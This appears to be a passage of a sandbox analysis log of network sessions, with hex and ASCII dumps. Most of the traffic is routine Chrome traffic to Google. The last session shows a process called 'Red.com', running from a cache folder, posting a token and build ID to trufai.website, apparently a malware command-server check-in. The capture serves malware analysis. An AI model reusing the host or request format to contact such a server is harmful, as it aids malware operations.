2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 50 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 50 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d Data Ascii: peof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a\|0:void 0};Qd\u003dfunction(){let a\u003dnull;if(!Pd)return a;try{const b\u003dc\u003d\u003ec;a\u003dPd.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}
2025-01-03 13:30:42 UTC	1390	IN	Data Raw: 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 50 64 5c 75 30 30 33 64 5f 2e 48 64 3b 5f 2e 54 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 57 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 6a 65 2c 6e 65 2c 66 65 3b 5f 2e 68 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 66 65 28 5f 2e 67 65 28 61 29 29 3a 64 65 7c 7c 28 64 65 5c 75 30 30 33 64 6e 65 77 20 Data Ascii: Of(b,0)\u003d\u003d0};Pd\u003d_.Hd;_.Td\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Wd\u003d/^\\s(?!javascript:)(?:[\\w+.-]+:\|[^:/?#](?:[/?#]\|$))/i;var je,ne,fe;_.he\u003dfunction(a){return a?new fe(_.ge(a)):de\|\|(de\u003dnew

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	172.217.18.4	443	2916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:42 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-03 13:30:42 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 03 Jan 2025 13:30:42 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-03 13:30:42 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-01-03 13:30:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	142.250.186.110	443	2916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:45 UTC	733	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-03 13:30:45 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 02 Jan 2025 03:30:10 GMT Expires: Fri, 02 Jan 2026 03:30:10 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 122435 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-03 13:30:45 UTC	474	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e Data Ascii: ction(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.n
2025-01-03 13:30:45 UTC	1390	IN	Data Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49765	142.250.185.142	443	2916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:46 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 905 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-03 13:30:46 UTC	905	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 39 31 31 30 34 33 36 36 34 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1735911043664",null,null,null,
2025-01-03 13:30:46 UTC	942	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=QNEUDlNte5xjd-vxoJlrMOwxaOQugwLedOgPVQYCE6tZZxTTIiQwp67WbkWXXkrwC3_4XExqqT2u1yWDRCpoWKNhz1fJFbVjJ5V5-UsYEOiKm7azIlJn0si0RPqW9b5OskWJ4xTQjFQ4YhEkiX_28CXW4UQIlxxINIEAiW0P2J2FmmJX0MrvsY2E; expires=Sat, 05-Jul-2025 13:30:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 03 Jan 2025 13:30:46 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 03 Jan 2025 13:30:46 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2025-01-03 13:30:46 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2025-01-03 13:30:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49768	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:46 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----90hln79r900zuaiekxt0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:46 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 30 68 6c 6e 37 39 72 39 30 30 7a 75 61 69 65 6b 78 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 39 30 68 6c 6e 37 39 72 39 30 30 7a 75 61 69 65 6b 78 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 39 30 68 6c 6e 37 39 72 39 30 30 7a 75 61 69 65 6b 78 74 30 0d 0a 43 6f 6e 74 Data Ascii: ------90hln79r900zuaiekxt0Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------90hln79r900zuaiekxt0Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------90hln79r900zuaiekxt0Cont
